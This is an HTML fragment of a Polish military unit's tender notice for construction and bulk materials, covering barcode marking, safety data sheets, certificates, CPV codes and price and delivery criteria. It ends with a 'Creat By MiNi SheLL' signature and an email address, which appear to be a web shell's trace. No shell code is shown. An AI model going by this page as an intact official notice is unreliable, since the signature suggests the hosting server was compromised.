7) Wykonawca zobowiązuje się do oznakowania materiałów budowlanych kodem kreskowym tj. materiały należy oznakować kodem kreskowym zgodnie z decyzją nr 3-MON  Ministra Obrony Narodowej z dnia 03.01.2014r. w sprawie wytycznych określających wymagania w zakresie znakowanie kodem kreskowym wyrobów dostarczanych do resortu obrony narodowej. Dostarczone materiały powinny być oznakowane zgodnie z paragrafem 4 pkt 1 ppkt 4 i 5( grupa materiałowa 4 i 5) w/w decyzji. Zastosowane etykiety powinny spełniać wymagania określone w pkt  5 dla grupy materiałowej 4 i 5 odpowiednio w/w decyzji.
8) Wykonawca jest zobowiązany do przekazania  wypełnionej Karty wyrobu w postaci elektronicznej ( format MS EXEL) oraz papierowej do Zamawiającego przedmiotu zamówienia wskazanego w umowie, SIWZ zgodnie z załącznikiem nr 6 do w/w decyzji. Wykonawca przekaże Zamawiającemu wypełnioną kartę wyrobu najpóźniej w dniu dostawy.
Na potwierdzenie w/w warunku Wykonawca zobowiązany jest do złożenia stosownego 
oświadczenia wg wzoru stanowiącego Załącznik nr 8 do SIWZ.
9) Z obowiązku oznakowania kodem kreskowym zostają wyłączone materiały nabywane w ilościach mniejszych niż standardowe opakowanie fabryczne, jeżeli producent ( Dostawca, Wykonawca)  nie oznacza kodem kreskowym pojedynczego wyrobu  lecz nanosi go na opakowaniu np. elektroda, piasek, żwir.
10) Wykonawca zobowiązany jest do dołączenia do każdej dostawy, dokumentów określających jakość przedmiotu umowy tj. certyfikaty   jakości,  atesty PZH, deklaracje zgodności, aprobaty techniczne itp.;
11) Wykonawca zobowiązany jest do dołączenia do każdej dostawy na wszystkie substancje i  preparaty niebezpieczne  karty charakterystyki zgodnie  z ustawą   z dnia 25.02.2011r. ( Dz.U. z 2011r. nr 63 poz. 322)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.10.00.00-1, 03.40.00.00-4, 14.60.00.00-7, 44.80.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. minimalny termin dostawy 10dni, maksym. termin dostawy 40 dni od dnia zawarcia umowy - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> materiałów branży budowlanej - materiały sypkie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Wyroby budowlane muszą posiadać certyfikaty ( deklaracje ) zgodnie z obowiązującymi normami lub aprobatę techniczną, posiadać oznaczenia CE zgodnie z ustawą o wyrobach budowlanych z dnia 16.04.2004 r. ( Dz. U. z 2004 r. Nr 92 poz. 881 z późniejszymi zmianami).
2) Na każdym opakowaniu w sposób trwały musi być naklejona etykieta.
3) Na etykiecie każdego opakowania mysi być podana nazwa materiału, nazwa producenta i data ważności w zakresie produktów chemicznych.
4) Data ważności musi wynosić minimum jeden rok od dnia dostarczenia do 45 Wojskowego Oddziału Gospodarczego  za wyjątkiem materiałów dla których producent określił termin ważności krótszy niż rok. W takim przypadku Zamawiający dopuszcza termin przydatności do użycia krótszy niż określony przez producenta o 14 dni.
5) Opakowania winny być fabrycznie zamknięte. Wykonawca zobowiązuje się dostarczyć materiały nowe, w pierwszej kategorii.
6) Wykonawca wraz z materiałami dostarczy nieodpłatnie dla Zamawiającego w wersji papierowej karty charakterystyki dla materiałów będącymi substancjami niebezpiecznymi bądź ich mieszaninami w myśl ustawy z dnia 25.02.2011  r. o substancjach chemicznych i ich mieszaninach ( Dz. U. z 2011 r. Nr 63 poz. 322 ). 
7) Wykonawca zobowiązuje się do oznakowania materiałów budowlanych kodem kreskowym tj. materiały należy oznakować kodem kreskowym zgodnie z decyzją nr 3/MON  Ministra Obrony Narodowej z dnia 03.01.2014r. w sprawie wytycznych określających wymagania w zakresie znakowanie kodem kreskowym wyrobów dostarczanych do resortu obrony narodowej. Dostarczone materiały powinny być oznakowane zgodnie z paragrafem 4 pkt 1 ppkt 4 i 5( grupa materiałowa 4 i 5) w/w decyzji. Zastosowane etykiety powinny spełniać wymagania określone w pkt  5 dla grupy materiałowej 4 i 5 odpowiednio w/w decyzji.
8) Wykonawca jest zobowiązany do przekazania  wypełnionej Karty wyrobu w postaci elektronicznej ( format MS EXEL) oraz papierowej do Zamawiającego przedmiotu zamówienia wskazanego w umowie, SIWZ zgodnie z załącznikiem nr 6 do w/w decyzji. Wykonawca przekaże Zamawiającemu wypełnioną kartę wyrobu najpóźniej w dniu dostawy.
Na potwierdzenie w/w warunku Wykonawca zobowiązany jest do złożenia stosownego 
oświadczenia wg wzoru stanowiącego Załącznik nr 8 do SIWZ.
9) Z obowiązku oznakowania kodem kreskowym zostają wyłączone materiały nabywane w ilościach mniejszych niż standardowe opakowanie fabryczne, jeżeli producent ( Dostawca, Wykonawca)  nie oznacza kodem kreskowym pojedynczego wyrobu  lecz nanosi go na opakowaniu np. elektroda, piasek, żwir.
10) Wykonawca zobowiązany jest do dołączenia do każdej dostawy, dokumentów określających jakość przedmiotu umowy tj. certyfikaty   jakości,  atesty PZH, deklaracje zgodności, aprobaty techniczne itp.;
11) Wykonawca zobowiązany jest do dołączenia do każdej dostawy na wszystkie substancje i  preparaty niebezpieczne  karty charakterystyki zgodnie  z ustawą   z dnia 25.02.2011r. ( Dz.U. z 2011r. nr 63 poz. 322).

Szczegółowy opis przedmiotu zamówienia zawierają Formularze cenowe, stanowiące Załącznik nr 2b do niniejszej specyfikacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.10.00.00-1, 03.40.00.00-4, 14.60.00.00-7, 44.80.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. termin realizacji każdorazowej dostawy od złożenia zamówienia do Dostawcy (przy czym maksymalny termin dostawy to 7 dn - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com